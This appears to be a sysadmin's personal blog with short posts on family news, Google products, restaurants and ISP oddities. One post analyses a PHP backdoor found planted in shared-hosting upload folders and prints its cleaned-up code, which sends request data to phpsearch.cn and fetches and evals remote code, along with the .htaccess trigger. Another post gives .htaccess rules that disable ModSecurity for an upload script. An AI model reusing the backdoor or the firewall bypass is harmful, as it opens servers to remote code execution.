Ramblings of a seasoned SysAdmin

More Than 48 Hours Offline

It has been a while since I spent time at home without going online. As a matter of fact I don’t remember at all when such an event has occurred before.

48 hours is strictly speaking, because 50 hours ago I did check my Gmail for 5 minutes. The truth is that I have not gotten online since Sunday. So this is it, the only thing that can prevent me from getting online is the little guy who revealed himself to the world on the Eve of Aidiladha 🙂

And I am online right now just to check out some forms and making sure that all that is needed has been paid. I am going to stay and work from home most probably until February. However I’m gonna stop by the office for a while tomorrow to send in some documents.

Oh yes BTW I’ve got to mention that I had the best experience at JPN (National Registration Department) Putrajaya on the 10th. It took me less than 30 minutes to settle the registration. That is really really cool and deserves a good mention.

It’s a totally different world for me now… exciting and scary at the same time. Wish me luck!!!

Thanks a lot for all the text, instant message, and email messages. I’m sorry if I missed to reply some.

I am not sure when I will be able to get online next and update this site but I will try to find time.

Gmail Stickers!

I was casually browsing the Official Gmail Blog this morning and saw that Gmail is giving away free Gmail stickers. The only thing you need to do is to send a self-stamped envelope to:

Send me some Gmail stickers already
P.O. Box 391420
Mountain View, CA 94039-1420

For International requests, we need to send the envelope along with a International reply coupon.

Unfortunately for me and other Malaysians, Pos Malaysia does not sell IRC. Yes, I called them at 1 300 300 300 hotline and they said they don’t have the service. Bummer! I am so disappointed!

I wonder if Google accept cheques or deduct some from my Adsense account already!

Lightweight Google Reader

I was surprised by a change made to Google Reader today, with a new lightweight layout. There’s no longer rounded corners and blue background. The feel is great and the speed is faster than before.

Read more in the Official Google Reader Blog: Square is the new round

Google @enstek

From conversations I had with my colleagues at work, and from other friends I heard that Google is going to have presence in Malaysia, specifically at @enstek in Sepang. It’s a new flagship area opening its wings to tech companies from all over the globe.

Is this really true? In some stories I even heard that construction work has started at the site. I would really appreciate it if anyone could point me to the right direction. Googling doesn’t help as the keywords are too common.

From my point of view, Google presence is definitely welcomed in Malaysia. There will be new job opportunities and I know for sure people will jump with joy and try their best to penetrate the company. As for me, I don’t think I am well qualified yet to work with a gigantic company like Google. But who knows… I don’t have a crystal ball to show my future.

What about you? Will you try your luck if Google starts recruiting in Malaysia?

This Is Not SPAM

Since the past 2 weeks I have been receiving funny and annoying emails that start exactly like this:

Maaf menganggu..
Maaf, ini bukan SPAM (This is not a SPAM). Tapi untuk menyampaikan satu berita mengenai 
biz yang menguntungkan
Kalau tak berminat delete saja

And each of them is actually promoting different programs: i.e. easy money, forex investments. Translation:

Sorry to disturb you..
Sorry, this is not SPAM. But this is to pass you a news about a profitable business
If you're not interested just delete it

Don’t these idiots know that when they start sending unrequested emails to multiple recipients at the same time, it’s considered SPAM?

So if I see one of them and kick them I can say: “I am not kicking you”.

Starbucks Sizing System

I was watching HBO when one of the short sections in between the movies were aired. It was about the new movie “Role Models”. I have always wondered why Starbucks have the sizing system “Tall” (small), “Grande” (medium), and “Venti” (large). It’s plain weird.

Interestingly Danny Donahue (played by Paul Rudd) mentioned this directly in the movie:

LMFAO. “Congratulations, you’re stupid in 3 languages.”

Cosmic Bowl Sucks

Well, to be really honest the light setting and the loud music is really cool. However I feel that the bowling alley is poorly maintained. Discolored screens and malfunctioning equipment really helped to spoil the mood for a good bowling night.

I was playing in lane 36 on Friday after work and I counted at least 8 times of malfunction. It’s either the pinsetter didn’t place any pins, or the spotting tongs kept slipping one pin off. It sucks and it really spoiled the playing mood.

I don’t recommend Cosmic Bowl Mid Valley either for any company events or casual games.

Upload Folder Invasions and Security

I was doing a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. There were supposed to be image, pdf, and video files in the upload folders but there were also .htaccess and PHP files in the main upload folder and each of the subfolders.

The first thing that crossed my mind was that my code was not secure enough – it’s difficult to handle Flash upload security so I used some most basic techniques to prevent illegal uploads. However I decided to venture into Internet Webhosting’s server (I also have an account there) and saw the same thing happening on a fellow blogger’s WordPress upload folder – which coincidentally is in the same server as my other account. I have so many “other” accounts I sometimes lost track.

Testing further I found that I am able to manipulate files located in other’s upload folder if the permission of 777 (drwxrwxrwx) is set. I was able to create new files, move existing files, and even worst delete them. Technically this is because the webserver process (apache for Apache 1.x and httpd for Apache 2.x) most usually runs as the user nobody or other common user account on the server. So it really does not matter who runs a PHP file from the browser, the server thinks the user always have the proper permission.

So in a normal shared hosting other users are actually able to copy your source code if you’re running a custom one (in contrast to WordPress which is publicly available).

This problem does not relate to other parts of the website or the database.

I am NOT going to post the codes that I use to check and test these claims, so it’s really up to you whether or not to trust me.

However the following code was in the foreign PHP files (they named using numbers – XXXXX.php), and they were in one line most probably to prevent people from understanding it. I cleaned it up to improve readability

< ?php
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
 
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd") 
	$f = $_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	eval($c);
else
{
	$cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
	curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
	$o = curl_exec($cu);
	curl_close($cu);
	eval($o);
};
?>

Lines 3-12 collects data about the request.
Line 14 dumps all of the collected information to a variable $z
$f is the variable that holds the URL of the culprit: phpsearch.cn

print base64_decode('cGhwc2VhcmNoLmNu');

Lines 16-17 handles some queries (I think if the request comes from them).
Line 18 tries to include the remote file http://ads1.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries to load the remote file http://7.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovLzcu');

And the final attempt in lines 23-27 tries to use the CURL extension to load http://71.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovLzcxLg==');

How is this possible? Well, they also uploaded .htaccess files that looks like this:

Options -MultiViews
ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only activates if a 404 (file not found) is encountered on the folder. But still, I don’t like the intrusion. Wouldn’t you?

I can’t really think of any workaround to the permission problem as users will always have to change the permission of upload folder to 777. Even changing the group ownership to the group used by the httpd process will not prevent access to other users.

However GoDaddy seems to have a good technique in overcoming this problem as I can’t access other users’ folders. It has been a while since I wanted to find out how they implemented this – I noticed it the first time I use their hosting since I didn’t have to change permissions for my upload folders.

PayPal in Bahasa Melayu

I recently received an email from PayPal announcing that they now support additional languages. One of them is my native tongue, Bahasa Melayu.

However when I clicked on the Malaysia flag it directs me to the same page as Bahasa Indonesia. Although many part of the Internet has already acknowledged and are well aware that these two languages are different, I am a tad surprised that PayPal is not one of them 🙂

[singlepic=3,420,800]

GMail Themes

I was jealous of Azlan when he was able to change his GMail theme yesterday, and so was Nazham.

But look at what I found when I woke up this morning:

[singlepic=2,420,420]

Sweet!!!

[singlepic=1,420,420]

2.59MB/Sec Download

I had to download the Flex SDK for work today and when I saw the file size I thought I can take some time to get coffee and a smoking break but I was wrong. I am not making it a big deal but I guess home users in Malaysia has never experienced this before.

The 118MB file was downloaded in less than a minute!

Oh yes, the file is downloaded to a server in the HQ in Massachusetts.

How I wish I get that at home! I am wondering whether US homes also get the same kind of speed. My dear US readers could you please shed some light upon us?

Weird IP Mismatch on TMNET Network

Tonight’s Internet access was annoyingly slow so I thought of recycling my ADSL connection. Out of habit I opened up WhatIsMyIP.us and was presented with a weird IP.

The top text with black background is the actual IP my router was assigned with (60.52.127.200).

And then I recycled my ADSL connection. The new IP was 60.50.203.72. However when I opened the site above again it still shows me the same IP. There is something fishy about this.

I tried ProxyWay and here’s what I got:

And here’s from CheckIP:

The two sites that gave me the correct and matching IP are IPChicken and IP-adress:

What the hell is wrong? Since TMNET has the reputation of doing stupid things right now I am thinking that they are testing some kind of HTTP bypassing. This is because the other traffic that I tested was not affected (e.g. SSH and FTP) and I see my “real” IP fine.

Anyone else is experiencing this twilight-zone scenario?

What Happened to Marché Mövenpick

I went to have lunch at at The Curve on Saturday and I was a bit disappointed by the lack of staff and all the waiting we had to do. While I understand that the system is for you to order and wait they should not have asked people to come back in 5 minutes if we actually have to wait for 20.

I was ordering the 1/2 Roasted Chicken meal and the guy who is attending the stall is also the same guy who cooks the mixed vegetable at the next stall. And the funniest thing of all is while the menu said roasted chicken they are actually reheating it on the grill. Yes, on the grill. So the chicken gets charred and tasted like charcoal, and loses all its moisture. The vegetable is all dried up, and I think that the menu has been changed (many meals have been removed).

The roasted chicken in the same restaurant used to be moist, juicy and the gravy was superb. This time they provided BBQ sauce.

And using the grill also means that it takes a lot longer than the oven. I saw that the oven was switched off so I think this may be a step to cut some cost?

What’s wrong with the restaurant? Are they so affected by the economy that they decided to provide improper food, lousy service, and jeopardize the whole business?

I won’t be visiting this restaurant anytime soon unless anyone really wants to eat something from the menu (the mixed vege and the sauteed mushroom still tastes the same). I’ll just go to Kenny Rogers for roasted chicken.

Flash Uploader Error

I was using YUI Uploader for a personal project and it works very well on my development notebook and server. However when the code is live on the server the Flash uploader failed with this error message:

[IOErrorEvent type="ioError" bubbles=false cancelable=false eventPhase=2 text="Error #2038"]

After a while I realized that it must be something server-side because when I used WireShark to see the traffic the server returns Error 500. The traffic is not captured by Firebug because it is Flash traffic.

The culprit is ModSecurity, a third party module used by most hosting companies. ModSecurity is a web application firewall that can work either embedded into Apache or as a reverse proxy.

A quick fix to allow uploads is to include these in the .htaccess file. These handle different Apache and ModSecurity versions and since we include the IfModule directive if the module is unavailable no error will be thrown. This relieves the need to consider what version of Apache and ModSecurity is used on the server.

For this example the script that handles the upload is named upload.php.

# Apache 1.x and ModSecurity 1.x <IfModule mod_security.c> <Files upload.php> SecFilterEngine Off SecFilterScanPOST Off </Files> </IfModule>

# Apache 2.x and ModSecurity 1.x <IfModule security_module> <Files upload.php> SecFilterEngine Off SecFilterScanPOST Off </Files> </IfModule>

# Apache 2.x and ModSecurity 2.x <IfModule security2_module> <Files upload.php> SecRuleEngine Off SecRequestBodyAccess Off </Files> </IfModule>

That’s it! This fixes the Flash uploader problem.

By the way it might be useful to let you know that this issue was encountered on a server hosted under the Ebiz Linux package by Exabytes.

Help Find Ozzie the Golden Retriever

[UPDATE] Ozzie was actually taken by a neighbor’s friend who thought the dog was lost. Ozzie was scared of thunder and wandered around to a Hari Raya open house nearby where the house owner asked his Chinese friend to bring Ozzie home. Ozzie is now back with his rightful owner he loves. [END UPDATE]

If you hang out or live around Bandar Utama or TTDI and saw this guy please help call 012 335 2308. I haven’t heard the story how she lost Ozzie yet.

He is cream-colored, 4 years old (ask him if you meet him), about 3 feet tall and does not bark meaninglessly. He’s a lovely dog but I never met him because I am afraid of canines.

Here’s a flyer she gave to me if anyone would like to help distribute: Lost – Ozzie – Golden Retriever